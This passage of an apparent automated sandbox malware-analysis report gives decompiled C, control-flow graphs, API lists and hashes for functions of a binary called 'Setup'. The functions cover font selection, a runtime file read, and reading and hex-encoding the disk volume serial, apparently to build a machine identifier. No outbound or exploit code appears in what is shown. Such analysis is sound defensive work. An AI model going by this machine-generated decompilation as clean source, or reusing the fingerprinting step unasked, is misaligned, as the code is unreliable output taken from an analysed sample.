                                                                                                                                                              control_flow_graph 1114 424280-4242f2 GetDC 1115 4242f4-4242fa 1114->1115 1116 424325 1114->1116 1115->1116 1117 424313-42431a 1115->1117 1118 424301-424308 1115->1118 1119 42430a-424311 1115->1119 1120 42431c-424323 1115->1120 1121 42432c-42433d 1116->1121 1117->1121 1118->1121 1119->1121 1120->1121 1122 42433f-424347 1121->1122 1123 42435c-424360 1121->1123 1122->1123 1124 424349-424358 1122->1124 1125 424362-424368 1123->1125 1126 424377-424383 1123->1126 1124->1123 1125->1126 1127 42436a-424375 1125->1127 1128 424389-424390 1126->1128 1127->1128 1129 424392-424396 1128->1129 1130 4243d7-4243de 1128->1130 1131 424398-4243bc GetDeviceCaps MulDiv 1129->1131 1132 4243be-4243d1 MulDiv 1129->1132 1133 4243e9-4243f1 1130->1133 1131->1130 1132->1130 1134 4243f3-4243f7 1133->1134 1135 424436-42443a 1133->1135 1134->1135 1136 4243f9-424429 call 424140 1134->1136 1137 424463-424467 1135->1137 1138 42443c-424461 GetDeviceCaps MulDiv 1135->1138 1143 42442e-424434 1136->1143 1140 424479-424495 ReleaseDC call 44f6c8 1137->1140 1141 424469-424476 call 45184a 1137->1141 1138->1137 1141->1140 1143->1133
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00424280(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed short* _a20) {
				struct HWND__* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				struct HWND__* _v28;
				signed int _v32;
				char _v100;
				signed int _v104;
				signed int _v108;
				struct HDC__* _v112;
				struct HWND__* _v116;
				intOrPtr _v164;
				void* _v176;
				int _v180;
				signed int _v184;
				signed int _t80;
				struct HWND__* _t103;
				void* _t113;
				void* _t141;
				void* _t142;
				signed int _t143;
				void* _t144;

				_t142 = __esi;
				_t141 = __edi;
				_t113 = __ebx;
				_t80 =  *0x561244; // 0xddd124f9
				_v32 = _t80 ^ _t143;
				_v104 = 1;
				_v112 = GetDC(0);
				_v28 = 0;
				_v24 = 0;
				_v20 = L"Tahoma";
				_v16 = L"MS Sans Serif";
				_v12 = L"Arial";
				_v8 = 0;
				_v184 = _a4 & 0x000000ff;
				_v184 = _v184 - 0x80;
				if(_v184 > 8) {
					L6:
					_v104 = 0;
				} else {
					switch( *((intOrPtr*)(_v184 * 4 +  &M00424498))) {
						case 0:
							_v24 = L"MS UI Gothic";
							goto L7;
						case 1:
							_v24 = L"Gulim";
							goto L7;
						case 2:
							goto L6;
						case 3:
							_v24 = L"SimSun";
							goto L7;
						case 4:
							_v24 = L"PMingLiU";
							goto L7;
					}
				}
				L7:
				asm("sbb eax, eax");
				_v108 =  ~_v104 + 2;
				if(_a20 != 0 && ( *_a20 & 0x0000ffff) != 0) {
					_v108 = _v108 - 1;
					 *((intOrPtr*)(_t143 + _v108 * 4 - 0x18)) = _a20;
				}
				if(_a8 == 0 ||  *_a8 == 0) {
					_v180 = (0 | _v104 != 0x00000000) + 9;
				} else {
					_v180 =  *_a8;
				}
				if(_v180 > 0) {
					if(_a16 == 0) {
						_v180 =  ~(MulDiv(_v180, 0x60, 0x48));
					} else {
						_v180 =  ~(MulDiv(_v180, GetDeviceCaps(_v112, 0x5a), 0x48));
					}
				}
				_v116 = 0;
				while( *((intOrPtr*)(_t143 + _v108 * 4 - 0x18)) != 0 && _v116 == 0) {
					asm("sbb eax, eax");
					_t103 = E00424140(_t113, _t141, _t142,  *((intOrPtr*)(_t143 + _v108 * 4 - 0x18)), _a4 & 0x000000ff, _v180, _a12, _v112,  &_v100,  ~_a8 &  &_v176); // executed
					_t144 = _t144 + 0x1c;
					_v116 = _t103;
					_v108 = _v108 + 1;
				}
				if(_a8 != 0) {
					 *_a8 = MulDiv(_v176 - _v164, 0x48, GetDeviceCaps(_v112, 0x5a));
				}
				if(_a20 != 0) {
					E0045184A(_a20,  &_v100);
				}
				ReleaseDC(0, _v112);
				return E0044F6C8(_v116, _t113, _v32 ^ _t143, _v112, _t141, _t142);
			}


























                                                                                                                                                              0x00424280
                                                                                                                                                              0x00424280
                                                                                                                                                              0x00424280
                                                                                                                                                              0x00424289
                                                                                                                                                              0x00424290
                                                                                                                                                              0x00424293
                                                                                                                                                              0x004242a2
                                                                                                                                                              0x004242a5
                                                                                                                                                              0x004242ac
                                                                                                                                                              0x004242b3
                                                                                                                                                              0x004242ba
                                                                                                                                                              0x004242c1
                                                                                                                                                              0x004242c8
                                                                                                                                                              0x004242d3
                                                                                                                                                              0x004242e5
                                                                                                                                                              0x004242f2
                                                                                                                                                              0x00424325
                                                                                                                                                              0x00424325
                                                                                                                                                              0x004242f4
                                                                                                                                                              0x004242fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424301
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042431c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042430a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424313
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004242fa
                                                                                                                                                              0x0042432c
                                                                                                                                                              0x00424331
                                                                                                                                                              0x00424336
                                                                                                                                                              0x0042433d
                                                                                                                                                              0x0042434f
                                                                                                                                                              0x00424358
                                                                                                                                                              0x00424358
                                                                                                                                                              0x00424360
                                                                                                                                                              0x00424383
                                                                                                                                                              0x0042436a
                                                                                                                                                              0x0042436f
                                                                                                                                                              0x0042436f
                                                                                                                                                              0x00424390
                                                                                                                                                              0x00424396
                                                                                                                                                              0x004243d1
                                                                                                                                                              0x00424398
                                                                                                                                                              0x004243b6
                                                                                                                                                              0x004243b6
                                                                                                                                                              0x00424396
                                                                                                                                                              0x004243d7
                                                                                                                                                              0x004243e9
                                                                                                                                                              0x004243fe
                                                                                                                                                              0x00424429
                                                                                                                                                              0x0042442e
                                                                                                                                                              0x00424431
                                                                                                                                                              0x004243e6
                                                                                                                                                              0x004243e6
                                                                                                                                                              0x0042443a
                                                                                                                                                              0x00424461
                                                                                                                                                              0x00424461
                                                                                                                                                              0x00424467
                                                                                                                                                              0x00424471
                                                                                                                                                              0x00424476
                                                                                                                                                              0x0042447f
                                                                                                                                                              0x00424495

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0042429C
                                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 004243A0
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 004243AE
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000060,00000048), ref: 004243C9
                                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00424442
                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00424458
                                                                                                                                                              • _wcscpy.LIBCMT ref: 00424471
                                                                                                                                                              • ReleaseDC.USER32 ref: 0042447F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDevice$Release_wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 218543050-0
                                                                                                                                                              • Opcode ID: addc902abe19bcb2e843a8c4ff13a2c574d834c9b2b0b35da3bccb5100abd372
                                                                                                                                                              • Instruction ID: 6a1f34e3b352a9f831fe859dfbab1ec0b461a88cf26c78c58544564a76178256
                                                                                                                                                              • Opcode Fuzzy Hash: addc902abe19bcb2e843a8c4ff13a2c574d834c9b2b0b35da3bccb5100abd372
                                                                                                                                                              • Instruction Fuzzy Hash: D4614E70A0031CDFDB10CFA4D849BAEBBB5FB48305F548159E919AB280D7789A84CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004547CB Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1148 4547cb-4547e7 1149 4547e9-4547ec 1148->1149 1150 45480a 1148->1150 1149->1150 1152 4547ee-4547f0 1149->1152 1151 45480c-454810 1150->1151 1153 454811-454816 1152->1153 1154 4547f2-454801 call 454477 1152->1154 1156 454825-454828 1153->1156 1157 454818-454823 1153->1157 1164 454802-454807 call 4557a5 1154->1164 1160 454835-454837 1156->1160 1161 45482a-454832 call 451d90 1156->1161 1157->1156 1159 454846-454859 1157->1159 1162 454863 1159->1162 1163 45485b-454861 1159->1163 1160->1154 1166 454839-454844 1160->1166 1161->1160 1167 45486a-45486c 1162->1167 1163->1167 1164->1150 1166->1154 1166->1159 1170 454872-454879 1167->1170 1171 45495c-45495f 1167->1171 1173 4548bf-4548c2 1170->1173 1174 45487b-454880 1170->1174 1171->1151 1176 4548c4-4548c8 1173->1176 1177 45492c-45492d call 4610bf 1173->1177 1174->1173 1175 454882 1174->1175 1178 4549bd 1175->1178 1179 454888-45488c 1175->1179 1181 4548e9-4548f0 1176->1181 1182 4548ca-4548d3 1176->1182 1190 454932-454936 1177->1190 1185 4549c1-4549ca 1178->1185 1188 454890-454893 1179->1188 1189 45488e 1179->1189 1186 4548f4-4548f7 1181->1186 1187 4548f2 1181->1187 1183 4548d5-4548dc 1182->1183 1184 4548de-4548e3 1182->1184 1192 4548e5-4548e7 1183->1192 1184->1192 1185->1151 1193 454990-454994 1186->1193 1194 4548fd-454909 call 4544c0 call 4617ac 1186->1194 1187->1186 1195 454964-45496a 1188->1195 1196 454899-4548ba call 44f6d7 1188->1196 1189->1188 1190->1185 1191 45493c-454940 1190->1191 1191->1193 1197 454942-454951 1191->1197 1192->1186 1202 4549a6-4549b8 call 454477 1193->1202 1203 454996-4549a3 call 451d90 1193->1203 1216 45490e-454913 1194->1216 1198 45496c-454978 call 451d90 1195->1198 1199 45497b-45498b call 454477 1195->1199 1205 454954-454956 1196->1205 1197->1205 1198->1199 1199->1164 1202->1164 1203->1202 1205->1170 1205->1171 1217 4549cf-4549d3 1216->1217 1218 454919-45491c 1216->1218 1217->1185 1218->1178 1219 454922-45492a 1218->1219 1219->1205
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004547CB(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E00451D90(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E004610BF(_t120, _t125, _t133); // executed
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00451D90(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E00454477(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E004557A5(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E004544C0(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106); // executed
												_t107 = E004617AC(_t120, _t125, _t131, _t133, __eflags); // executed
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E00451D90(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E00454477(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E0044F6D7(_t120, _t123, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E00454477(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                                                                              0x004547cb
                                                                                                                                                              0x004547d3
                                                                                                                                                              0x004547d7
                                                                                                                                                              0x004547dc
                                                                                                                                                              0x004547de
                                                                                                                                                              0x004547e1
                                                                                                                                                              0x004547e7
                                                                                                                                                              0x0045480a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004547ee
                                                                                                                                                              0x004547ee
                                                                                                                                                              0x004547f0
                                                                                                                                                              0x00454811
                                                                                                                                                              0x00454814
                                                                                                                                                              0x00454816
                                                                                                                                                              0x00454825
                                                                                                                                                              0x00454825
                                                                                                                                                              0x00454828
                                                                                                                                                              0x0045482d
                                                                                                                                                              0x00454832
                                                                                                                                                              0x00454832
                                                                                                                                                              0x00454835
                                                                                                                                                              0x00454837
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454839
                                                                                                                                                              0x00454839
                                                                                                                                                              0x0045483e
                                                                                                                                                              0x00454841
                                                                                                                                                              0x00454844
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454846
                                                                                                                                                              0x00454849
                                                                                                                                                              0x0045484d
                                                                                                                                                              0x00454854
                                                                                                                                                              0x00454857
                                                                                                                                                              0x00454859
                                                                                                                                                              0x00454863
                                                                                                                                                              0x0045485b
                                                                                                                                                              0x0045485e
                                                                                                                                                              0x0045485e
                                                                                                                                                              0x0045486a
                                                                                                                                                              0x0045486c
                                                                                                                                                              0x0045495c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454872
                                                                                                                                                              0x00454872
                                                                                                                                                              0x00454872
                                                                                                                                                              0x00454879
                                                                                                                                                              0x004548bf
                                                                                                                                                              0x004548bf
                                                                                                                                                              0x004548c2
                                                                                                                                                              0x0045492d
                                                                                                                                                              0x00454933
                                                                                                                                                              0x00454936
                                                                                                                                                              0x004549c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004549c7
                                                                                                                                                              0x0045493c
                                                                                                                                                              0x00454940
                                                                                                                                                              0x00454990
                                                                                                                                                              0x00454990
                                                                                                                                                              0x00454994
                                                                                                                                                              0x0045499e
                                                                                                                                                              0x004549a3
                                                                                                                                                              0x004549a3
                                                                                                                                                              0x004549ab
                                                                                                                                                              0x004549b3
                                                                                                                                                              0x004549b4
                                                                                                                                                              0x004549b5
                                                                                                                                                              0x004549b6
                                                                                                                                                              0x004549b7
                                                                                                                                                              0x00454802
                                                                                                                                                              0x00454802
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454807
                                                                                                                                                              0x00454942
                                                                                                                                                              0x00454945
                                                                                                                                                              0x00454948
                                                                                                                                                              0x0045494d
                                                                                                                                                              0x0045494e
                                                                                                                                                              0x0045494e
                                                                                                                                                              0x0045494e
                                                                                                                                                              0x00454951
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454951
                                                                                                                                                              0x004548c4
                                                                                                                                                              0x004548c8
                                                                                                                                                              0x004548e9
                                                                                                                                                              0x004548ee
                                                                                                                                                              0x004548f0
                                                                                                                                                              0x004548f2
                                                                                                                                                              0x004548f2
                                                                                                                                                              0x004548ca
                                                                                                                                                              0x004548d1
                                                                                                                                                              0x004548d3
                                                                                                                                                              0x004548e0
                                                                                                                                                              0x004548e0
                                                                                                                                                              0x004548e0
                                                                                                                                                              0x004548e3
                                                                                                                                                              0x004548d5
                                                                                                                                                              0x004548d7
                                                                                                                                                              0x004548da
                                                                                                                                                              0x004548da
                                                                                                                                                              0x004548e5
                                                                                                                                                              0x004548e5
                                                                                                                                                              0x004548f4
                                                                                                                                                              0x004548f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004548fd
                                                                                                                                                              0x004548fd
                                                                                                                                                              0x004548fe
                                                                                                                                                              0x00454902
                                                                                                                                                              0x00454907
                                                                                                                                                              0x00454908
                                                                                                                                                              0x00454909
                                                                                                                                                              0x0045490e
                                                                                                                                                              0x00454911
                                                                                                                                                              0x00454913
                                                                                                                                                              0x004549cf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004549cf
                                                                                                                                                              0x00454919
                                                                                                                                                              0x0045491c
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x00454922
                                                                                                                                                              0x00454925
                                                                                                                                                              0x00454927
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454927
                                                                                                                                                              0x004548f7
                                                                                                                                                              0x0045487b
                                                                                                                                                              0x0045487e
                                                                                                                                                              0x00454880
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454882
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454888
                                                                                                                                                              0x0045488a
                                                                                                                                                              0x0045488c
                                                                                                                                                              0x0045488e
                                                                                                                                                              0x0045488e
                                                                                                                                                              0x00454890
                                                                                                                                                              0x00454893
                                                                                                                                                              0x00454964
                                                                                                                                                              0x00454966
                                                                                                                                                              0x0045496a
                                                                                                                                                              0x00454973
                                                                                                                                                              0x00454978
                                                                                                                                                              0x00454978
                                                                                                                                                              0x0045497b
                                                                                                                                                              0x00454980
                                                                                                                                                              0x00454981
                                                                                                                                                              0x00454982
                                                                                                                                                              0x00454983
                                                                                                                                                              0x00454984
                                                                                                                                                              0x0045498a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454899
                                                                                                                                                              0x004548a2
                                                                                                                                                              0x004548a7
                                                                                                                                                              0x004548aa
                                                                                                                                                              0x004548ac
                                                                                                                                                              0x004548af
                                                                                                                                                              0x004548b1
                                                                                                                                                              0x004548b4
                                                                                                                                                              0x004548b7
                                                                                                                                                              0x004548b7
                                                                                                                                                              0x00454954
                                                                                                                                                              0x00454954
                                                                                                                                                              0x00454954
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454872
                                                                                                                                                              0x0045486c
                                                                                                                                                              0x00454837
                                                                                                                                                              0x00454818
                                                                                                                                                              0x0045481d
                                                                                                                                                              0x0045481d
                                                                                                                                                              0x00454820
                                                                                                                                                              0x00454823
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454823
                                                                                                                                                              0x004547f2
                                                                                                                                                              0x004547f2
                                                                                                                                                              0x004547f7
                                                                                                                                                              0x004547f8
                                                                                                                                                              0x004547f9
                                                                                                                                                              0x004547fa
                                                                                                                                                              0x004547fb
                                                                                                                                                              0x00454801
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454801

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3886058894-0
                                                                                                                                                              • Opcode ID: 24e9373897bc8a5cc2d72240ab2ba003cf9559ff3a241c8706108772e9f9b500
                                                                                                                                                              • Instruction ID: b48dc7675cf6e0c95097a90f61d0df77d4aa9603786d68242fc11d6efe4b1aba
                                                                                                                                                              • Opcode Fuzzy Hash: 24e9373897bc8a5cc2d72240ab2ba003cf9559ff3a241c8706108772e9f9b500
                                                                                                                                                              • Instruction Fuzzy Hash: 8A510A74900244EBCB209FB9884559F7BB5EFC132DF14821BFC259A292D3389D99CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00482980 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00482980(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v60;
				char _v64;
				char _v328;
				short _v330;
				intOrPtr _v334;
				short _v336;
				char _v400;
				char _v416;
				WCHAR* _v420;
				char _v421;
				char _v422;
				signed int _v428;
				signed int _t52;
				signed int _t53;
				signed int _t79;
				signed int _t112;
				void* _t113;
				void* _t120;

				_t111 = __esi;
				_t110 = __edi;
				_t80 = __ebx;
				_push(0xffffffff);
				_push(0x50a68e);
				_push( *[fs:0x0]);
				_t52 =  *0x561244; // 0xddd124f9
				_t53 = _t52 ^ _t112;
				_v32 = _t53;
				_push(_t53);
				 *[fs:0x0] =  &_v16;
				_v428 = 0;
				_v24 = 0;
				E004175C0(E00434050( &_v421));
				_v8 = 1;
				_v336 = 0;
				_v334 = 0;
				_v330 = 0;
				E00495D00(__ebx, __edi, __esi, 0x23,  &_v64, 1, 1); // executed
				E0045508B(E00416A30( &_v60),  &_v336, 0, 0, 0);
				PathAddBackslashW( &_v336);
				GetVolumeInformationW( &_v336, 0, 0,  &_v24, 0, 0, 0, 0); // executed
				_v28 = E00453304(__edi, __esi,  &_v416, "%.8x", _v24);
				E004827F0(_a8, E00451E10(_a8),  &_v328);
				E004826C0( &_v416, _v28,  &_v328);
				_t120 = _t113 - 0x19c + 0x4c;
				_v20 =  &_v400;
				_v420 = 0;
				while(1) {
					_t107 = _v420;
					if(_v420 >= _v28) {
						break;
					}
					_t79 = E00448860(_v20, L"%x",  *(_t112 + _v420 - 0x19c) & 0x000000ff);
					_t120 = _t120 + 0xc;
					_v20 = _v20 + _t79 * 2;
					_v420 =  &(_v420[0]);
				}
				E00417910( &_v400, E00434050( &_v422));
				_v428 = _v428 | 0x00000001;
				_v8 = 0;
				E004176E0();
				 *[fs:0x0] = _v16;
				return E0044F6C8(_a4, _t80, _v32 ^ _t112, _t107, _t110, _t111);
			}



























                                                                                                                                                              0x00482980
                                                                                                                                                              0x00482980
                                                                                                                                                              0x00482980
                                                                                                                                                              0x00482983
                                                                                                                                                              0x00482985
                                                                                                                                                              0x00482990
                                                                                                                                                              0x00482997
                                                                                                                                                              0x0048299c
                                                                                                                                                              0x0048299e
                                                                                                                                                              0x004829a1
                                                                                                                                                              0x004829a5
                                                                                                                                                              0x004829ab
                                                                                                                                                              0x004829b5
                                                                                                                                                              0x004829cb
                                                                                                                                                              0x004829d0
                                                                                                                                                              0x004829d9
                                                                                                                                                              0x004829e2
                                                                                                                                                              0x004829e8
                                                                                                                                                              0x004829f9
                                                                                                                                                              0x00482a17
                                                                                                                                                              0x00482a26
                                                                                                                                                              0x00482a43
                                                                                                                                                              0x00482a61
                                                                                                                                                              0x00482a7c
                                                                                                                                                              0x00482a96
                                                                                                                                                              0x00482a9b
                                                                                                                                                              0x00482aa4
                                                                                                                                                              0x00482aa7
                                                                                                                                                              0x00482ac2
                                                                                                                                                              0x00482ac2
                                                                                                                                                              0x00482acb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00482ae5
                                                                                                                                                              0x00482aea
                                                                                                                                                              0x00482af3
                                                                                                                                                              0x00482abc
                                                                                                                                                              0x00482abc
                                                                                                                                                              0x00482b0e
                                                                                                                                                              0x00482b1c
                                                                                                                                                              0x00482b22
                                                                                                                                                              0x00482b29
                                                                                                                                                              0x00482b34
                                                                                                                                                              0x00482b49

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00495D00: _memset.LIBCMT ref: 00495D56
                                                                                                                                                                • Part of subcall function 00495D00: SHGetFolderPathW.SHELL32(00000000,004CC849,00000000,00000000,?,?,?,DDD124F9), ref: 00495D6F
                                                                                                                                                                • Part of subcall function 00495D00: PathAddBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495D93
                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00482A17
